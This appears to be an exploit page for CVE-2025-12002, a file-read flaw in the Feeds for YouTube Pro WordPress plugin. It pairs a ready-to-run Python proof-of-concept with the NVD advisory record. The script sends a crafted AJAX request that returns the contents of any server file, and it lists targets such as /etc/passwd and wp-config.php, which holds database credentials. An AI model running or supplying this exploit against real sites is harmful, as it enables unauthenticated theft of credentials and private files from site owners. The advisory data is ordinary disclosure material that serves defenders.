CVE-2025-12002

import requests import sys # CVE-2025-12002 PoC - Feeds for YouTube Pro Arbitrary File Read # Target: WordPress site with Feeds for YouTube Pro plugin <= 2.6.0 # Prerequisites: 'Save Featured Images' enabled, 'Disable WP Posts' disabled def exploit_file_read(target_url, file_path): """ Exploit the arbitrary file read vulnerability via sby_check_wp_submit AJAX action. Args: target_url: Base URL of the WordPress site file_path: Path to the file to read (e.g., /etc/passwd, wp-config.php) Returns: Content of the requested file """ # Construct the AJAX endpoint ajax_url = f"{target_url}/wp-admin/admin-ajax.php" # Prepare the malicious request # The vulnerability is in the sby_check_wp_submit action # The file parameter is not properly sanitized, allowing path traversal data = { 'action': 'sby_check_wp_submit', 'task': 'customize_feed', 'file': file_path # Vulnerable parameter - no sanitization } try: # Send the exploit request response = requests.post(ajax_url, data=data, timeout=30) if response.status_code == 200: return response.text else: return f"Error: HTTP {response.status_code}" except requests.exceptions.RequestException as e: return f"Request failed: {str(e)}" def main(): if len(sys.argv) < 3: print("Usage: python cve-2025-12002.py <target_url> ") print("Example: python cve-2025-12002.py http://example.com /etc/passwd") sys.exit(1) target_url = sys.argv[1].rstrip('/') file_path = sys.argv[2] print(f"[*] Targeting: {target_url}") print(f"[*] Attempting to read: {file_path}") print("-" * 50) content = exploit_file_read(target_url, file_path) print(content) if __name__ == "__main__": main() # Common target files for exploitation: # - /etc/passwd (Linux) or C:\Windows\boot.ini (Windows) # - wp-config.php (WordPress configuration with DB credentials) # - ../wp-config.php (path traversal variant) # - /var/www/html/wp-config.php (absolute path variant)

{"cve": {"id": "CVE-2025-12002", "sourceIdentifier": "[email protected]", "published": "2026-01-17T03:16:02.840", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Feeds for YouTube Pro plugin for WordPress is vulnerable to arbitrary file read in all versions up to, and including, 2.6.0 via the 'sby_check_wp_submit' AJAX action. This is due to insufficient sanitization of user-supplied data and the use of that data in a file operation. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information, granted the 'Save Featured Images' setting is enabled and 'Disable WP Posts' is disabled. Note: This vulnerability only affects the Pro version of Feeds for YouTube."}, {"lang": "es", "value": "El plugin Feeds para YouTube Pro para WordPress es vulnerable a la lectura arbitraria de archivos en todas las versiones hasta la 2.6.0, inclusive, a través de la acción AJAX 'sby_check_wp_submit'. Esto se debe a una sanitización insuficiente de los datos proporcionados por el usuario y al uso de esos datos en una operación de archivo. Esto permite a atacantes no autenticados leer el contenido de archivos arbitrarios en el servidor, que pueden contener información sensible, siempre que la configuración 'Save Featured Images' esté habilitada y 'Disable WP Posts' esté deshabilitada. Nota: Esta vulnerabilidad solo afecta a la versión Pro de Feeds para YouTube."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/Services/AdminAjaxService.php#L25", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/Services/AdminAjaxService.php#L339", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/Services/AdminAjaxService.php#L383", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/sby-functions.php#L1038", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/feeds-for-youtube/trunk/inc/sby-functions.php#L1047", "source": "[email protected]"}, {"url": "https://smashballoon.com/youtube-feed/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e9f31ec5-c376-45b1-9ffe-35c80b89b60d?source=cve", "source": "[email protected]"}]}}